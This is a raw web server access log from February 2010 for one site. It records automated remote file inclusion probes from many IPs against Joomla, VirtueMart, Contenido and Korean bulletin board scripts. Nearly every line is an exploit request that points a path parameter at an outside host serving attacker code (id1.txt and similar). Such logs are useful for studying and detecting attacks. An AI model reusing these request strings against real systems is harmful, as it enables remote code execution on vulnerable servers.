220.73.144.196 - - [20/Feb/2010:06:45:22 -0800] "GET /logs/access_100111.log/index.php?ptconf[src]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:45:22 -0800] "GET /index.php?ptconf[src]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:06:45:22 -0800] "GET /components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:06:45:22 -0800] "GET /logs//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:06:45:22 -0800] "GET /logs/access_100119.log%20%20//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:45:25 -0800] "GET /logs/index.php?ptconf[src]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:06:45:32 -0800] "GET /components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:06:45:32 -0800] "GET /logs//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:06:45:32 -0800] "GET /logs/access_100119.log%20%20//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:45:35 -0800] "GET /logs//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:45:35 -0800] "GET /components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:45:36 -0800] "GET /logs/access_100119.log%20%20//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:06:45:37 -0800] "GET /logs/access_100203.log//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:45:38 -0800] "GET /logs/access_100207.log%20%20//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:45:38 -0800] "GET /components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:45:38 -0800] "GET /logs/access_100119.log%20%20//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:45:39 -0800] "GET /logs//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:45:40 -0800] "GET /logs/access_100207.log%20%20//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:06:45:44 -0800] "GET /logs/access_100207.log%20%20//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:06:45:46 -0800] "GET /logs/access_100207.log%20%20//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:45:47 -0800] "GET /logs//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:45:48 -0800] "GET /components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:45:48 -0800] "GET /logs/access_100119.log%20%20//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:45:53 -0800] "GET /components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:45:53 -0800] "GET /logs/access_100119.log%20%20//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:45:53 -0800] "GET /logs//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:45:53 -0800] "GET /logs/access_100207.log%20%20//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:45:59 -0800] "GET /logs/access_100207.log%20%20//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [20/Feb/2010:06:46:34 -0800] "GET /logs/access_100123.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:47:12 -0800] "GET /logs/access_100127.log%20%20//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.156 - - [20/Feb/2010:06:47:19 -0800] "GET /logs/access_100121.log//skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
72.22.65.80 - - [20/Feb/2010:06:47:25 -0800] "GET /logs/access_100119.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:47:25 -0800] "GET /logs//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:47:25 -0800] "GET /components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:47:25 -0800] "GET /logs/access_100119.log//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:47:58 -0800] "GET /logs/access_100207.log//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:48:08 -0800] "GET /logs/access_100210.log%20%20/secure.php?&cfgProgDir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:48:08 -0800] "GET /logs/secure.php?&cfgProgDir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:48:08 -0800] "GET /secure.php?&cfgProgDir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:48:13 -0800] "GET /secure.php?&cfgProgDir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:48:13 -0800] "GET /logs/access_100210.log%20%20/secure.php?&cfgProgDir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:48:13 -0800] "GET /logs/secure.php?&cfgProgDir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:48:17 -0800] "GET /components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:48:17 -0800] "GET /logs/access_100119.log//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:48:17 -0800] "GET /logs//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:06:48:20 -0800] "GET /errors.php?error=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:06:48:20 -0800] "GET /logs/errors.php?error=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:06:48:25 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:06:48:37 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:06:48:37 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:06:48:37 -0800] "GET /logs/access_100203.log%20%20//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.146.200 - - [20/Feb/2010:06:48:46 -0800] "GET /components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
72.55.146.200 - - [20/Feb/2010:06:48:46 -0800] "GET /logs/access_100207.log//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
72.55.146.200 - - [20/Feb/2010:06:48:46 -0800] "GET /logs//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:48:48 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:48:48 -0800] "GET /logs/access_100127.log%20%20/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:48:48 -0800] "GET /errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:06:48:51 -0800] "GET /logs/access_100119.log%20%20/errors.php?error=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:48:52 -0800] "GET /logs/access_100207.log//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.156 - - [20/Feb/2010:06:48:57 -0800] "GET /logs/access_100121.log//skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:06:49:15 -0800] "GET /logs/access_100129.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:06:49:15 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:06:49:15 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:49:34 -0800] "GET /logs/access_100127.log%20%20//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:49:41 -0800] "GET /logs/errors.php?error=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:49:41 -0800] "GET /logs/access_100127.log%20%20/errors.php?error=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:49:41 -0800] "GET /errors.php?error=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.146.200 - - [20/Feb/2010:06:49:48 -0800] "GET /logs/access_100210.log//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:50:07 -0800] "GET /logs/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:50:07 -0800] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:50:10 -0800] "GET /secure.php?&cfgProgDir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:50:10 -0800] "GET /logs/access_100210.log/secure.php?&cfgProgDir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:50:10 -0800] "GET /logs/secure.php?&cfgProgDir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:50:10 -0800] "GET /logs/access_100124.log%20%20/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:50:10 -0800] "GET /logs/access_100127.log%20%20//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:50:18 -0800] "GET /logs/access_100127.log%20%20/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:50:31 -0800] "GET /logs/access_100210.log/secure.php?&cfgProgDir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:50:31 -0800] "GET /logs/secure.php?&cfgProgDir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:50:34 -0800] "GET /secure.php?&cfgProgDir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:50:53 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:50:53 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:50:53 -0800] "GET /logs/access_100127.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [20/Feb/2010:06:51:04 -0800] "GET /logs/access_100207.log//components/com_artref/artref.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [20/Feb/2010:06:51:04 -0800] "GET /logs//components/com_artref/artref.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [20/Feb/2010:06:51:04 -0800] "GET /components/com_artref/artref.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:51:05 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:51:05 -0800] "GET /logs/access_100204.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:51:05 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:51:15 -0800] "GET /logs/access_100204.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:51:15 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:51:16 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.146.200 - - [20/Feb/2010:06:51:47 -0800] "GET /logs/access_100210.log%20//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:51:50 -0800] "GET /logs/access_100204.log////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:51:50 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:51:51 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:52:00 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:52:00 -0800] "GET /logs/access_100204.log////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:52:00 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [20/Feb/2010:06:52:09 -0800] "GET /logs/access_100210.log//components/com_artref/artref.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
90.176.234.205 - - [20/Feb/2010:06:52:11 -0800] "GET /logs//help.php?css_path=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [20/Feb/2010:06:52:11 -0800] "GET /logs/access_100204.log//help.php?css_path=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [20/Feb/2010:06:52:11 -0800] "GET /help.php?css_path=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:52:15 -0800] "GET /secure.php?&cfgProgDir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:52:15 -0800] "GET /logs/access_100210.log%20%20/secure.php?&cfgProgDir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:52:15 -0800] "GET /logs/secure.php?&cfgProgDir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:52:18 -0800] "GET /logs/access_100127.log////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:52:19 -0800] "GET /logs/secure.php?&cfgProgDir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:52:19 -0800] "GET /secure.php?&cfgProgDir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:52:19 -0800] "GET /logs/access_100210.log%20%20/secure.php?&cfgProgDir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [20/Feb/2010:06:52:20 -0800] "GET /logs/access_100204.log%20%20//help.php?css_path=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [20/Feb/2010:06:52:23 -0800] "GET /logs//help.php?css_path=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [20/Feb/2010:06:52:23 -0800] "GET /help.php?css_path=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:06:52:27 -0800] "GET /logs/access_100127.log////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
